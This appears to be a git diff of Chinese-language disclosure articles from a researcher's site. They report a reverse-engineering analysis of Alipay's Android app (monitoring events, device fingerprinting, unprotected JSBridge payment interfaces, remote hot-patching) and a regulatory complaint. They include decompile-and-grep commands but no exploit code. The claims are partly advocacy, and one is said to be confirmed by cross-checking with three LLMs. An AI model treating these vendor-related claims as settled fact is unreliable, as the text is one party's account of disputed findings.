 当你打开支付宝扫码付款时，你可能不会想到：在你看不到的地方，支付宝正在监控你的截屏行为、剪贴板内容、蓝牙连接、通话状态，甚至你每一次切换页面的精确时间戳。
 这不是猜测。这是对支付宝APK文件进行完整逆向工程后，从代码中直接提取的事实。
 本文所有结论均来自对APK文件的静态反编译分析（工具：jadx、radare2、Ghidra），任何人都可以独立验证。完整分析代码已开源在GitHub。
 ---
 ## 一、208个API拦截点
 支付宝内部存在一个名为**DexAOP**的字节码级拦截框架（代码路径：`com.alipay.dexaop`，包含1606个Java文件）。它在编译阶段就将拦截代码注入到Android系统API的调用链中。
 我们统计了全部拦截点——**976个代理类 + 180个回调桩 = 覆盖208个API类别**：
 | 拦截类别 | API数量 | 隐私影响 |
 |----------|---------|----------|
 | **蓝牙** | 17 | BLE/GATT/A2DP/HID全覆盖 |
 | **电话** | 17 | 通话状态、SIM卡、IMEI |
 | **网络/HTTP** | 15 | 拦截所有网络请求 |
 | **通讯录** | 12 | 完整通讯录访问 |
 | **传感器** | 10 | 加速度计、陀螺仪、生物识别 |
 | **录音** | 9 | 麦克风全链路拦截 |
 | **存储/文件** | 8 | 文件系统读写 |
 | **WiFi** | 5 | SSID、BSSID、WiFi扫描 |
 | **摄像头** | 5 | Camera + Camera2全部API |
 | **剪贴板** | 4 | 你复制的每一段文字 |
 | **GPS定位** | 3 | 精确地理位置 |
 | **NFC** | 6 | 非接触式支付+卡模拟 |
 | **加密操作** | 3 | Cipher/Signature/MAC |
 | **其他** | 92 | WebView、存储等 |
 | **合计** | **208** | |
 ### 超出支付安全范畴的拦截
 我们理解支付APP需要一些权限来保障交易安全。但以下拦截远远超出了"支付安全"的边界：
 - **Camera2 PreviewCallback** — 拦截摄像头的每一帧预览画面。扫码只需要识别结果，为什么要拦截预览帧？
 - **RingtoneManager** — 支付APP为什么关心你的铃声设置？
 - **所有加密操作** — 拦截Java层的`Cipher`（加密）、`Signature`（签名）和`MAC`（消息认证），意味着APP内任何组件的加密行为都在监控之下
 - **14个录音拦截点** — 覆盖麦克风访问的每一个环节，精确记录"录音开始"和"录音结束"时间戳
 ---
 ## 二、22个行为监控事件
 除了208个API拦截，代码中还有一个独立的**行为监控系统**（代码路径：`com.taobao.wireless.security.adapter.datacollection`），通过BroadcastReceiver注册了22个监控事件。
 **工作机制**：APP启动后3秒延迟激活。每个事件被记录为`(事件编号, 时间戳)`格式，每积攒10条批量上报服务器（事件ID `100184`）。
 | 编号 | 监控什么 | 你可能想知道 |
 |------|---------|------------|
 | 0-1 | 屏幕亮/灭 | 知道你什么时候看手机 |
 | 2-3 | APP前/后台 | 知道你什么时候离开支付宝 |
 | 4 | 飞行模式 | 检测你是否断网 |
 | 5 | 系统时间修改 | 检测你是否改时间 |
 | **6** | **截屏** | **知道你截了支付页面的屏** |
 | **7** | **录屏** | **知道你是否在录屏** |
 | 8-10 | 蓝牙开关/连接/断开 | 追踪你的蓝牙外设 |
 | **11** | **通话状态** | **知道你什么时候接/打电话** |
 | 12 | 耳机插拔 | 知道你是否戴耳机 |
 | **13** | **剪贴板变化** | **你复制的内容被记录** |
 | 14 | 网络切换 | WiFi/移动网络变化 |
 | 15-21 | Activity生命周期×7 | 精确到每个页面的创建/暂停/销毁 |
 ### 远程开关
 代码中有一个**OrangeConfig远程配置开关**（namespace: `securityguard_orange_namespace`，key: `132`），默认值`"0"`。服务器可以随时将其设为`"1"`来激活全部22个监控事件。
 换句话说：**即使当前没开，服务器一个指令就能全部打开。**
 ### 截屏监控意味着什么？
 当你截屏保存一个转账记录时——也许是为了留证据——支付宝会立即知道。当你打开录屏软件时，支付宝也会立即知道。
 问一个直接的问题：**监控用户截屏和录屏，合理的业务场景是什么？** 如果答案是"防止敏感信息泄露"，那反过来想：这不正是在阻止用户保留自己的交易证据吗？
 ---
 ## 三、29项设备超级指纹
 支付宝代码中的`DeviceInfoCapturerFull`类包含一个29项`switch`语句（已通过3-LLM交叉验证确认），收集：
 **硬件标识**: IMEI、OAID、WiFi MAC地址、MediaDrm ID
 **SIM卡**: 运营商信息、SIM序列号
 **系统**: 音频路由、屏幕分辨率、时区、语言
 **应用**: 已安装应用签名信息、已授予权限列表
 这29项数据被组合生成一个叫**UMID**的跨安装持久化设备ID——你卸载支付宝重装，它依然能识别出这是同一部手机。该ID存储在系统KeyStore中，不会被常规清理删除。
 **定期上报**：这些指纹数据不是一次性收集，而是定期上传服务器。
 ### 《个人信息保护法》怎么说？
 第26条规定：收集个人信息应当限于实现处理目的的**最小范围**。
 29项设备信息 + 跨安装追踪 + 定期上传 = "最小必要"吗？
 在欧盟GDPR框架下，IMEI和MAC地址被明确归类为"个人数据"。新加坡PDPC已对此立案调查（案号#00629724）。
 ---
 ## 四、97%的内部接口没有权限保护
 这可能是最令人震惊的发现。
 支付宝使用一个叫**Ariver**的框架管理JSBridge接口——小程序和H5页面通过这些接口调用原生功能（支付、获取位置、读通讯录等）。
 我们扫描了**全部408个BridgeExtension类**的`permit()`方法：
 ```
 有权限检查的接口:    12个 (2.9%)
 没有权限检查的接口:  396个 (97.1%)
 ```
 在Ariver框架代码中（`DefaultAccessController.java:132`），`permit()`返回`null`意味着**直接跳过所有权限检查**。
 没有权限保护的高危接口包括：
 - **6个支付类** — TradePayBridgeExtension、DCEPWalletBridgeExtension（数字人民币钱包）
 - **5个认证类** — LoginExtension、VerifyIdentityBridgeExtension
 - **3个NFC类** — NFCBridgeExtension、NfcPayExtension
 - **6个文件类** — FileBridgeExtension、UploadFileBridgeExtension
 - **6个硬件类** — ScanBridgeExtension（摄像头）、ClipboardBridgeExtension（剪贴板）、MakePhoneCallBridgeExtension（拨打电话）
 396个无保护接口意味着：**一旦攻击者找到入口，几乎可以调用支付宝的任何功能——包括支付、定位和通讯录。** 而入口确实存在（详见我们提交的9个CVE漏洞）。
 ---
 ## 五、服务器可以远程修改你手机上的代码
 在每一个安全关键方法中，我们都发现了一个`ChangeQuickRedirect`字段。这是一个叫**PatchProxy**的热修复框架——它允许服务器在**不经过应用商店审核、不需要用户同意**的情况下，远程修改支付宝在你手机上的运行行为。
 被PatchProxy覆盖的方法包括：
 - TLS证书验证（可远程关闭HTTPS安全检查）
 - 权限检查（可远程关闭接口保护）
 - 签名验证（可远程关闭请求签名校验）
 - 支付校验（可远程修改支付流程）
 通俗理解：**你手机上支付宝的代码不是固定的——蚂蚁集团的服务器随时可以改。**
 热修复是行业常见做法。但关键区别在于：支付宝的热修复**覆盖了安全验证方法**（而非仅修复bug），用户**不会收到任何通知**，修改可以在**毫秒级**生效。
 ---
 ## 六、"说了什么就推荐什么"——技术解释
 很多用户反映：和朋友聊天提到某个商品，打开支付宝就看到了推荐。
 ### 我们的结论：有能力，但没有发现后台偷录证据
 代码中确实存在完整的录音基础设施：25+个录音相关Java文件、4种编码器（WAV/AAC/PCM/MP3）、14个麦克风API拦截点。但我们**没有找到后台静默录音的触发机制**——没有隐藏的后台Service，没有独立的音频上传通道。
 更合理的技术解释是：
 1. **同一WiFi → 家庭画像**：你和家人连同一个路由器，路由器MAC地址被共享，家人搜了什么你也会看到推荐
 2. **跨APP设备指纹**：UMID/OAID在多个阿里系APP间共享，淘宝的搜索影响支付宝的推荐
 3. **确认偏差**：你只记住了"准"的那几次，忘记了不准的几百次
 ---
 ## 七、行业对比
 | 能力 | 支付宝 | 行业一般做法 |
 |------|--------|-------------|
 | API拦截 | 208个类别（DexAOP） | 30-50个（支付相关） |
 | 行为监控 | 22个事件（含截屏/录屏/剪贴板） | 5-8个（登录态/网络） |
 | 设备指纹 | 29项（跨安装追踪） | 10-15项 |
 | 内部接口保护 | 97%无权限检查 | 安全框架通常默认拒绝 |
 | 远程代码修改 | 覆盖安全验证方法 | 热修复通常不覆盖安全方法 |
 ---
 ## 八、如何自己验证
 ```bash
 # 1. 下载APK (APKPure, 版本10.8.30.8000)
 # 2. 反编译
 jadx -d output --show-bad-code Alipay.apk
 # 3. 统计DexAOP拦截点
 grep -rn "proxy" output/sources/com/alipay/dexaop/ | wc -l
 # 4. 搜索行为监控
 grep -rn "SCREEN_SHOT\|SCREEN_RECORD\|PrimaryClipChanged\|PHONE_STATE" output/sources/
 # 5. 统计permit()返回null
 grep -A3 "public Permission permit()" output/sources/ | grep "return null" | wc -l
 # 6. 查看远程开关
 grep -rn "securityguard_orange_namespace" output/sources/
 ```
 完整分析工具和结果：https://github.com/sgInnora/alipay-securityguard-analysis
 ---
 ## 九、厂商回应与后续
 - **2026-03-07**: 我们向蚂蚁集团报告了17个安全漏洞
 - **2026-03-10**: 蚂蚁集团回复：**"正常功能"**
 - **2026-03-11**: 我们公开披露研究成果。4小时后，蚂蚁集团的律师事务所（北京格韵律师事务所）发出删除投诉
 - **2026-03-15**: 微信公众号4篇相关文章**全部被删除**，无任何事前通知，依据"《网络安全法》"
 - **2026-03-15**: 服务器端开始拦截我们的PoC验证请求（API返回空白页）
 - **2026-03-17**: 9个漏洞已提交国际CVE数据库，38个国家和地区的机构已回应
 **厂商的应对模式**：口头否认 → 律师函 → 删除文章 → 服务器端封堵PoC → 平台全面审查
 9个安全漏洞已提交国际CVE数据库（编号待分配）。研究成果已被Packet Storm Security收录发布（Advisory #217089），香港金管局、卢森堡CSSF、新加坡PDPC、英国FCA等机构已确认收到并启动处理程序。
 ---
 ## 我们的问题
 1. **必要性**：支付宝拦截208个系统API、监控22种行为、收集29项设备指纹——这些都符合"最小必要"原则吗？
 2. **知情权**：用户是否被明确告知这些数据收集行为？隐私政策中是否逐项列明了截屏监控、剪贴板监控、通话状态监控？
 3. **97%**：97%的内部接口没有权限保护——这符合安全开发最佳实践吗？
 4. **远程控制**：服务器可以远程修改安全验证逻辑——用户是否应该有知情权？
 5. **全生态**：这个安全SDK被阿里系多款APP共享（淘宝、闲鱼、饿了么等）——10亿+用户是否意识到这一点？
 ---
 **作者**: Jiqiang Feng / Innora AI Security Research
 **联系**: feng@innora.ai
 **完整报告**: https://innora.ai/zfb/
 **代码与工具**: https://github.com/sgInnora/alipay-securityguard-analysis
 **Packet Storm Advisory**: #217089
 *本文基于v10.8.30.8000版本静态分析。厂商可能已通过服务器端热修复修改了部分行为，但客户端代码中的架构和能力仍然存在。*
 **本文永久地址**: https://innora.ai/zfb/privacy-analysis.html
 **如果本文在任何平台被删除，请访问上述地址。这也是为什么我们需要一个不受单一平台审查的互联网。**
--- a/wechat_regulatory_article_v1.md
+++ b/wechat_regulatory_article_v1.md
@@ -0,0 +1,161 @@
 # 我以中国公民身份，向网信办正式举报了支付宝
 > 208个API拦截、22个行为监控、97%接口无保护 — 举报全文公开
 ---
 ## 为什么写这篇文章
 2026年3月18日凌晨，我以中华人民共和国公民身份，依据《个人信息保护法》第七十条赋予的举报权利，向中央网络安全和信息化委员会办公室（网信办）APP个人信息治理工作组正式提交了一份举报。
 举报对象：支付宝（com.eg.android.AlipayGphone）
 举报主体：支付宝（中国）网络技术有限公司 / 蚂蚁科技集团股份有限公司
 同时，举报副本已同步发送至12321网络不良与垃圾信息举报受理中心和网信办数据安全管理部门。
 这不是一次冲动行为。这是持续一个月的逆向工程分析、负责任披露被拒、文章被删除、PoC被服务器端封堵之后，一个中国公民依法行使权利的选择。
 ---
 ## 举报的四项核心事实
 ### 事实一：208个API拦截 — 远超支付功能所需
 支付宝内置DexAOP字节码拦截框架（1606个Java文件、976个代理类），系统性拦截208类设备API：
 | 类别 | 数量 | 与支付功能的关系 |
 |------|------|-----------------|
 | 蓝牙 | 17 | 无直接关系 |
 | 电话/通信 | 17 | 无直接关系 |
 | 通讯录 | 12 | 无直接关系 |
 | 录音/麦克风 | 9 | 无直接关系 |
 | 摄像头 | 5 | 仅扫码需要，预览帧拦截无必要 |
 | 剪贴板 | 4 | 无直接关系 |
 | 加密操作 | 3 | 监控其他组件的加密行为 |
 | 其他 | 141 | 含WiFi/GPS/传感器/NFC等 |
 | **合计** | **208** | |
 《个人信息保护法》第六条要求"最小必要"。208个API拦截是"最小必要"吗？
 举报中引用的法规：《个保法》第六条、《APP违法违规收集使用个人信息行为认定方法》第四条、《网络数据安全管理条例》第21条。
 ### 事实二：22个行为监控 — 截屏、剪贴板、通话状态
 支付宝在启动3秒后激活行为监控系统，记录以下行为并每10条批量上报服务器：
 **你截屏，它知道。你录屏，它知道。你接电话，它知道。你复制了什么，它知道。**
 - 截屏检测（编号6）
 - 录屏检测（编号7）
 - 通话状态（编号11）
 - 剪贴板变化（编号13）
 - 蓝牙连接（编号8-10）
 - 屏幕亮灭（编号0-1）
 - 还有Activity生命周期等共22个事件
 这些监控行为是否在隐私政策中逐项告知了用户？《个保法》第十七条要求"真实、准确、完整地向个人告知处理的个人信息种类"。
 更关键的是：代码中有一个远程开关（OrangeConfig, key:132），服务器可以随时激活全部22个监控。用户无法知情，更无法控制。
 ### 事实三：PatchProxy — 你手机上的支付宝可以被远程改代码
 这可能是最值得监管关注的发现。
 支付宝通过PatchProxy（ChangeQuickRedirect）机制，允许蚂蚁集团服务器在不经过应用商店审核、不发布新版本、不通知用户的情况下，远程替换已安装APP中的任意方法——包括权限检查、支付验证、签名校验。
 这意味着什么？
 你安装支付宝时同意的隐私政策和功能行为，可以在你不知道的情况下被远程修改。你以为你在用A版本，实际上服务器已经把它变成了B版本。
 《个保法》第十四条第二款："处理目的、处理方式等发生变更的，应当重新取得个人同意。"
 PatchProxy显然违反了这一条。
 ### 事实四：97%内部接口无权限保护 — 含数字人民币钱包
 扫描全部408个内部JSBridge接口，396个（97.1%）的权限检查方法返回null——也就是说，没有任何安全防护。
 无保护的接口包括：
 - 6个支付类接口（含数字人民币钱包DCEPWalletBridgeExtension）
 - 5个认证类接口（登录、身份验证）
 - 3个NFC接口（非接触式支付）
 - 6个文件操作接口（上传/下载）
 数字人民币是中国人民银行发行的法定数字货币。其钱包操作接口在支付宝APP内缺乏权限保护，这是一个严肃的金融安全问题。
 ---
 ## 举报全文
 以下为提交给网信办的举报邮件全文（已脱敏身份证号）：
 [因篇幅原因，举报全文请访问：https://innora.ai/zfb/privacy-analysis.html]
 举报邮件发送至以下三个渠道：
 1. 网信办APP治理专线：Appzhili@cac.gov.cn
 2. 12321举报中心：abuse@12321.cn
 3. 网信办数据安全：shujuju@cac.gov.cn
 ---
 ## 全球同步：25封监管更新邮件
 在向中国网信办举报的同时，我们向全球22个监管机构发送了技术更新邮件，通报SecurityGuard SDK的最新逆向发现。
 ### 已有正式案件的机构（补充新证据）
 | 机构 | 国家 | 案件号 | 更新内容 |
 |------|------|--------|----------|
 | PDPC | 新加坡 | #00629724 | 208 API + PatchProxy |
 | CSSF | 卢森堡 | CSSFWB-2026-080 | GDPR Art.25 + Art.32 |
 | HKMA | 香港 | CE20260313175412 | 支付接口无保护 |
 | Apple | — | OE01052449093014 | 热更新政策违反 |
 | FCA | 英国 | Whistleblowing | 金融安全风险 |
 | OAIC | 澳大利亚 | Intake | 隐私影响 |
 | CIRCL | 卢森堡 | #4782984 | 技术更新 |
 ### 欧盟隐私监管（GDPR攻击线）
 EDPB、Irish DPC、意大利Garante、荷兰AP、德国BfDI — 5个欧盟数据保护机构收到了相同的GDPR违规分析，重点是PatchProxy违反了GDPR第25条（数据保护设计原则）。
 ### 金融监管 + CERT
 MAS新加坡、OJK印尼、FMA新西兰、BNM马来西亚 + ANSSI法国、HKCERT、SingCERT、CERT-In — 8个机构收到了金融安全和技术分析更新。
 ---
 ## 这件事的时间线
 | 日期 | 事件 |
 |------|------|
 | 2月16日 | 开始安全分析 |
 | 2月25日 | 首次向蚂蚁集团报告漏洞 |
 | 3月7日 | 第二次报告（17个漏洞详细报告） |
 | 3月10日 | 蚂蚁集团回复："正常功能" |
 | 3月11日 | 公开披露。4小时后收到律师函 |
 | 3月12日 | 6个CVE提交MITRE + 189封全球通报邮件 |
 | 3月15日 | 微信4篇文章被全部删除 + 服务器端封堵PoC |
 | 3月17日 | SecurityGuard逆向完成 + 3个新CVE + GitHub公开 |
 | **3月18日** | **向网信办正式举报 + 25封监管更新邮件** |
 ---
 ## 为什么要公开举报内容
 1. **透明是最好的保护**。公开举报内容意味着：如果举报被无故忽视或压制，公众可以知道。
 2. **技术真相不应该被删除**。此前4篇微信文章已被蚂蚁集团律师团队删除，但代码分析的结论不会因为删除文章而改变。
 3. **作为中国公民，我有权举报**。《个保法》第七十条明确赋予了这一权利。行使法律赋予的权利，不需要道歉。
 ---
 ## 你可以做什么
 1. **检查权限**：进入手机设置 → 隐私 → 应用权限，检查支付宝已获取的权限，撤销非必要权限
 2. **关注进展**：我们会持续跟踪网信办和各国监管机构的回应
 3. **传播真相**：如果你认为10亿用户有权知道自己的手机在被怎样监控——请转发
 **完整技术报告**：https://innora.ai/zfb/privacy-analysis.html
 **代码与工具**：https://github.com/sgInnora/alipay-securityguard-analysis
 本文永久地址：https://innora.ai/zfb/regulatory-complaint.html
 如果本文被删除，请访问上述地址。
--- a/wifi-rtt-tracking.html
+++ b/wifi-rtt-tracking.html
@@ -135,7 +135,56 @@
    }
  </style>
 </head>
-<body>
+<body style="padding-top:76px;">
 <!-- Innora Global Nav — injected -->
 <style>
 .innora-nav-wrap{position:fixed;top:0;left:0;width:100%;z-index:9999;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Noto Sans SC",sans-serif}
 .innora-nav{display:flex;justify-content:space-between;align-items:center;padding:0 20px;height:46px;background:rgba(18,18,26,.92);backdrop-filter:blur(10px);-webkit-backdrop-filter:blur(10px);border-bottom:1px solid rgba(255,255,255,.08)}
 .innora-nav a.brand{color:#e0e0e8;text-decoration:none;font-weight:600;font-size:.95rem}
 .innora-nav-links{display:flex;list-style:none;margin:0;padding:0;gap:12px;flex-wrap:wrap}
 .innora-nav-links a{color:#9898a8;text-decoration:none;font-size:.8rem;transition:color .2s}
 .innora-nav-links a:hover,.innora-nav-links a.active{color:#4488ff}
 .innora-badge{display:flex;justify-content:center;align-items:center;gap:8px;height:26px;background:#000;font-size:.7rem;font-family:'SF Mono','Fira Code',monospace;border-bottom:1px solid rgba(255,255,255,.06)}
 .innora-badge a{color:#44cc88;text-decoration:none}.innora-badge a:hover{text-decoration:underline}
 .innora-badge span{color:#666}
 .innora-hmb{display:none;cursor:pointer;background:none;border:none;padding:4px}
 .innora-hmb i{display:block;width:20px;height:2px;margin:4px 0;background:#e0e0e8;transition:.3s}
@media(max-width:900px){
 .innora-nav-links{display:none;position:absolute;top:46px;left:0;width:100%;flex-direction:column;background:rgba(18,18,26,.97);padding:8px 0;gap:0}
 .innora-nav-links.open{display:flex}
 .innora-nav-links li{text-align:center;padding:8px}
 .innora-hmb{display:block}
 }
 </style>
 <header class="innora-nav-wrap">
 <nav class="innora-nav">
 <a class="brand" href="/zfb/">Innora AI — Alipay Research</a>
 <ul class="innora-nav-links" id="inav">
 <li><a href="/zfb/">Main</a></li>
 <li><a href="/zfb/article_censorship.html">Censorship</a></li>
 <li><a href="/zfb/patchproxy-146k.html">PatchProxy</a></li>
 <li><a href="/zfb/wifi-rtt-tracking.html">WiFi RTT</a></li>
 <li><a href="/zfb/transport-encryption.html">Encryption</a></li>
 <li><a href="/zfb/privacy-analysis.html">Privacy</a></li>
 <li><a href="/zfb/regulatory-complaint.html">Regulatory</a></li>
 <li><a href="/zfb/rebuttal.html">Rebuttal</a></li>
 </ul>
 <button class="innora-hmb" onclick="document.getElementById('inav').classList.toggle('open')"><i></i><i></i><i></i></button>
 </nav>
 <div class="innora-badge">
 <span>Verify:</span>
 <a href="https://github.com/sgInnora/alipay-securityguard-analysis">Docker 37/37</a>
 <span>|</span>
 <a href="https://zenodo.org/records/19186848">Zenodo DOI</a>
 <span>|</span>
 <a href="https://eprint.iacr.org/2026/526">IACR 2026/526</a>
 <span>|</span>
 <a href="https://packetstormsecurity.com/files/217089/">Packet Storm</a>
 </div>
 </header>
 <!-- /Innora Global Nav -->
  <div class="page-wrapper">
    <!-- Top navigation -->